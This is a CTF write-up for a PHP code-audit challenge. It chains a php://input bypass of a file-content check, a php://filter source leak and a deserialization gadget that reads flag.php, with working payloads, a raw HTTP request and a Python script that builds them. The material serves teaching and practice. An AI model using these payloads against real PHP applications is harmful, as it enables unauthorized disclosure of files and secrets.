1. NiZhuanSiWei

A code-audit challenge; the usual audit approach is enough. There are three gates in index.php: a strict comparison on the content of a user-supplied file, a blacklist that rejects any `$file` containing "flag", and an `unserialize()` on user input followed by an `echo` of the result.
Challenge source:

<?php  
// index.php

$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
// Gate 1: $text is opened as a file and its content must equal the string exactly.
// The second argument 'r' is passed as use_include_path; it is truthy but otherwise harmless.
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    // Gate 2: the include path may not contain "flag", so flag.php cannot be included directly.
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        // Gate 3: attacker-controlled unserialize(), and the result is echoed,
        // which invokes __toString() on whatever object comes back.
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

First, pass the first `if` with the `php://input` pseudo-protocol: `file_get_contents("php://input")` returns the raw request body, so sending `welcome to the zjctf` as the body satisfies the strict comparison (a `data://` URL carrying the same string would work too). Then read `useless.php` with the `php://filter` pseudo-protocol, e.g. `file=php://filter/read=convert.base64-encode/resource=useless.php`: `include()` then pulls in the base64 text of the file instead of executing it, so the source appears in the response and can be decoded offline.

(screenshot omitted: 伪协议.png)

<?php  
// useless.php

class Flag{  //flag.php  
    public $file;  
    // PHP method names are case-insensitive, so __tostring is the __toString magic method;
    // it runs when a Flag object is echoed and reads whatever path $file points to.
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>  

The `Flag` class gives us an arbitrary file read through deserialization: a serialized `Flag` whose `file` property is `flag.php` is passed as `password`, and the `echo $password` in index.php triggers `__toString()`, which reads the file. The "flag" blacklist only applies to `$file`, not to `$password`, so this bypasses gate 2.
Exploit:

<?php
// exp.php - generates the serialized payload for the password parameter

class Flag{  //flag.php
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}

$a = new Flag();
$a->file = 'flag.php';
echo serialize($a);             // O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
echo "\n" . urlencode(serialize($a)); // URL-encoded form for the query string

Including `useless.php` defines the `Flag` class, so `unserialize($password)` now yields a real `Flag` object rather than `__PHP_Incomplete_Class`, and the `echo` fires `__toString()`. Note that the request below is a GET with a body; `php://input` returns the raw body regardless of method.
Final payload:

GET /?text=php://input&file=useless.php&password=O%3a4%3a"Flag"%3a1%3a{s%3a4%3a"file"%3bs%3a8%3a"flag.php"%3b} HTTP/1.1
Host: f3916eba-c013-41b6-b33f-06d4d285f5b3.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 20

welcome to the zjctf
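The full chain as an added example (not part of the original writeup): it builds the serialized `Flag` object by hand so the `O:4:"Flag":1:{...}` format is visible, produces the query strings for both steps (the `php://filter` leak of `useless.php` and the final deserialization request), assembles a raw HTTP request with the body that passes the first gate, and decodes the base64 that the filter step returns. The host name and the sample response are placeholders constructed here, not taken from the challenge instance.

```python
import base64
from urllib.parse import urlencode

# What file_get_contents($text) must return to pass the first if-check.
GATE_TEXT = "welcome to the zjctf"
# What index.php echoes once the gate is passed; the leaked file follows it.
GATE_ECHO = f"<br><h1>{GATE_TEXT}</h1></br>"


def php_serialize_object(class_name, props):
    """Serialize a PHP object whose public properties are all strings.

    Reproduces PHP's serialize() for this simple case:
    O:<len>:"<class>":<count>:{s:<len>:"<prop>";s:<len>:"<value>";...}
    Lengths are byte lengths, which is how PHP counts them.
    """
    body = ""
    for name, value in props.items():
        body += f's:{len(name.encode())}:"{name}";s:{len(value.encode())}:"{value}";'
    return f'O:{len(class_name.encode())}:"{class_name}":{len(props)}:{{{body}}}'


def filter_read_url(path):
    """php://filter URL that makes include() emit the file base64-encoded
    instead of executing it, so PHP source survives in the response."""
    return f"php://filter/read=convert.base64-encode/resource={path}"


def stage1_query():
    """Step 1: leak useless.php. php://input satisfies the gate because
    file_get_contents('php://input') returns the raw request body."""
    return urlencode({"text": "php://input", "file": filter_read_url("useless.php")})


def stage2_query():
    """Step 2: include useless.php (defines Flag) and hand unserialize() a
    Flag whose file property is flag.php; echo then calls __toString()."""
    payload = php_serialize_object("Flag", {"file": "flag.php"})
    return urlencode({"text": "php://input", "file": "useless.php", "password": payload})


def build_request(host, query, body=GATE_TEXT):
    """Raw HTTP request with the gate string as the body. The original
    writeup used GET with a body; POST is used here, php://input does not care."""
    lines = [
        f"POST /?{query} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: text/plain",
        f"Content-Length: {len(body.encode())}",
        "Connection: close",
        "",
        body,
    ]
    return "\r\n".join(lines)


def decode_filter_leak(response_body):
    """Recover the source leaked by the php://filter step: strip the banner
    that index.php prints, then base64-decode what include() emitted."""
    if not response_body.startswith(GATE_ECHO):
        raise ValueError("gate not passed: response does not start with the banner")
    blob = response_body[len(GATE_ECHO):].strip()
    return base64.b64decode(blob).decode()


# Constructed stand-in for a filter-step response (not captured from the challenge).
SAMPLE_USELESS = "<?php\nclass Flag{ public $file; }\n"
SAMPLE_RESPONSE = GATE_ECHO + base64.b64encode(SAMPLE_USELESS.encode()).decode()

if __name__ == "__main__":
    host = "challenge.example"  # placeholder host, not the original instance
    print(build_request(host, stage1_query()))
    print()
    print(decode_filter_leak(SAMPLE_RESPONSE))
    print()
    print(build_request(host, stage2_query()))
```

The hand-rolled serializer is deliberately limited to string properties; for anything richer, generating the payload with PHP's own `serialize()` (as exp.php above does) is less error-prone, but the byte-length fields are the part that most often breaks when a payload is edited by hand.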
Last modification: January 29th, 2020 at 06:47 pm